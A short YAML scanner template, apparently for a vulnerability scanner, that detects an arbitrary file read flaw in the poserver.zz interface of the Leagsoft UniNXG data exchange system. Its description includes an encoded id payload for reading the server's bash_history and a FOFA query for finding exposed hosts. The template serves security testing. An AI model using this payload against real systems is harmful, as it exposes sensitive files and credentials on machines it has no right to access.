id: leagsoft-uninxg-fileread

info:
    name: 联软安渡UniNXG安全数据交换系统任意文件读取漏洞
    author: qwtd
    severity: high
    verified: true
    description: |
        联软安渡UniNXG安全数据交换系统 poserver.zz 接口存在任意文件读取漏洞，攻击者成功利用该漏洞，可实现任意文件读取，获取敏感信息。
        可以修改id值为KmcgY3MtJm0lcmUsFl85ZhVmL3E4bSZ3amQvaitsF2srO2ckKW0icitsOHI/bis7OGM8cg==读取到bash_history文件
        fofa: body="UniExServices"

rules:
  r0:
    request:
      method: GET
      path: /UniExServices/poserver.zz?pgop=opendiskdoc&id=
    expression: response.status == 200 && response.body.bcontains(b'PageOffice Server Version')
expression: r0()

